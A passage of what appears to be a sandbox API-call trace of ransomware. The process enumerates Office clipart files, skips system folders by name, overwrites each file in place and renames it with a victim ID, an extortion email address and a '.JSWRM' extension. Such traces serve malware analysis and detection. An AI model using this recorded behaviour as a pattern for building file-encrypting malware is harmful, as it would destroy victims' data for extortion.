dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0095.772] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=20338) returned 1 [0095.772] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.772] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4f70) returned 0x24d210 [0095.772] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4f70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x4f70, lpOverlapped=0x0) returned 1 [0095.799] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.799] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4f70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x4f70, lpOverlapped=0x0) returned 1 [0095.799] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0095.799] CloseHandle (hObject=0x314) returned 1 [0095.799] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0095.799] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0095.799] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0095.799] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0095.799] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0095.800] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0095.800] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0095.800] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0095.800] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0095.800] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0095.800] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0095.800] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0095.800] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0095.800] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0095.800] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00212_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00212_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00212_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00212_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0095.802] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0095.802] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0095.802] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0095.802] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x102ed99a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x102ed99a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10313bcd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1f74, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00221_.WMF", cAlternateFileName="")) returned 1 [0095.802] lstrcmpiW (lpString1="SO00221_.WMF", lpString2=".") returned 1 [0095.802] lstrcmpiW (lpString1="SO00221_.WMF", lpString2="..") returned 1 [0095.802] lstrcmpiW (lpString1="SO00221_.WMF", lpString2="...") returned 1 [0095.802] lstrcmpiW (lpString1="SO00221_.WMF", lpString2="windows") returned -1 [0095.802] lstrcmpiW (lpString1="SO00221_.WMF", lpString2="recovery") returned 1 [0095.802] lstrcmpiW (lpString1="SO00221_.WMF", lpString2="perflogs") returned 1 [0095.802] lstrcmpiW (lpString1="SO00221_.WMF", lpString2="documents and settings") returned 1 [0095.802] lstrcmpiW (lpString1="SO00221_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0095.802] lstrcmpiW (lpString1="SO00221_.WMF", lpString2="system volume information") returned -1 [0095.802] lstrcmpiW (lpString1="SO00221_.WMF", lpString2="msocache") returned 1 [0095.802] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0095.802] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00221_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.802] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00221_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00221_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.802] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0095.802] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0095.802] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00221_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.802] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00221_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00221_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.802] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0095.802] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0095.802] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0095.802] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0095.802] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0095.802] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0095.802] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00221_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00221_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0095.803] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=8052) returned 1 [0095.803] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.803] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1f70) returned 0x205850 [0095.803] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1f70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1f70, lpOverlapped=0x0) returned 1 [0095.806] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.806] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1f70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1f70, lpOverlapped=0x0) returned 1 [0095.806] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0095.806] CloseHandle (hObject=0x314) returned 1 [0095.806] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0095.806] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0095.806] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0095.806] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0095.806] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0095.806] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0095.806] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0095.806] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a390 [0095.806] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a390, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0095.806] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a390 | out: hHeap=0x1e0000) returned 1 [0095.806] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0095.806] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0095.806] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0095.806] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0095.806] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00221_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00221_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00221_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00221_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0095.807] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0095.807] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0095.807] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0095.807] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10313bcd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10313bcd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10339e29, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1e5c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00222_.WMF", cAlternateFileName="")) returned 1 [0095.807] lstrcmpiW (lpString1="SO00222_.WMF", lpString2=".") returned 1 [0095.808] lstrcmpiW (lpString1="SO00222_.WMF", lpString2="..") returned 1 [0095.808] lstrcmpiW (lpString1="SO00222_.WMF", lpString2="...") returned 1 [0095.808] lstrcmpiW (lpString1="SO00222_.WMF", lpString2="windows") returned -1 [0095.808] lstrcmpiW (lpString1="SO00222_.WMF", lpString2="recovery") returned 1 [0095.808] lstrcmpiW (lpString1="SO00222_.WMF", lpString2="perflogs") returned 1 [0095.808] lstrcmpiW (lpString1="SO00222_.WMF", lpString2="documents and settings") returned 1 [0095.808] lstrcmpiW (lpString1="SO00222_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0095.808] lstrcmpiW (lpString1="SO00222_.WMF", lpString2="system volume information") returned -1 [0095.808] lstrcmpiW (lpString1="SO00222_.WMF", lpString2="msocache") returned 1 [0095.808] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0095.808] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00222_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.808] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00222_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00222_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.808] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0095.808] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0095.808] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00222_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.808] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00222_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00222_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.808] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0095.808] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0095.808] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0095.808] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0095.808] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0095.808] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0095.808] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00222_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00222_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0095.809] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7772) returned 1 [0095.809] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.809] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1e50) returned 0x205850 [0095.809] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1e50, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1e50, lpOverlapped=0x0) returned 1 [0095.811] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.811] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1e50, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1e50, lpOverlapped=0x0) returned 1 [0095.811] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0095.811] CloseHandle (hObject=0x314) returned 1 [0095.811] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0095.811] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0095.811] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0095.811] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0095.811] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0095.811] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0095.811] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0095.811] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0095.811] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0095.811] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0095.811] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0095.811] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0095.811] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0095.811] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0095.811] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00222_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00222_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00222_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00222_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0095.812] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0095.812] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0095.812] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0095.812] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10313bcd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10313bcd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10313bcd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3642, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00223_.WMF", cAlternateFileName="")) returned 1 [0095.812] lstrcmpiW (lpString1="SO00223_.WMF", lpString2=".") returned 1 [0095.812] lstrcmpiW (lpString1="SO00223_.WMF", lpString2="..") returned 1 [0095.812] lstrcmpiW (lpString1="SO00223_.WMF", lpString2="...") returned 1 [0095.812] lstrcmpiW (lpString1="SO00223_.WMF", lpString2="windows") returned -1 [0095.812] lstrcmpiW (lpString1="SO00223_.WMF", lpString2="recovery") returned 1 [0095.812] lstrcmpiW (lpString1="SO00223_.WMF", lpString2="perflogs") returned 1 [0095.812] lstrcmpiW (lpString1="SO00223_.WMF", lpString2="documents and settings") returned 1 [0095.812] lstrcmpiW (lpString1="SO00223_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0095.812] lstrcmpiW (lpString1="SO00223_.WMF", lpString2="system volume information") returned -1 [0095.812] lstrcmpiW (lpString1="SO00223_.WMF", lpString2="msocache") returned 1 [0095.812] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0095.813] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00223_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.813] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00223_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00223_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.813] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0095.813] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0095.813] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00223_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.813] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00223_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00223_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.813] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0095.813] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0095.813] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0095.813] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0095.813] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0095.813] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0095.813] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00223_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00223_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0095.813] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=13890) returned 1 [0095.813] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.813] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3640) returned 0x24d210 [0095.814] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3640, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3640, lpOverlapped=0x0) returned 1 [0095.816] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.816] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3640, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3640, lpOverlapped=0x0) returned 1 [0095.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0095.816] CloseHandle (hObject=0x314) returned 1 [0095.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0095.816] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0095.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0095.816] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0095.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0095.817] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0095.817] 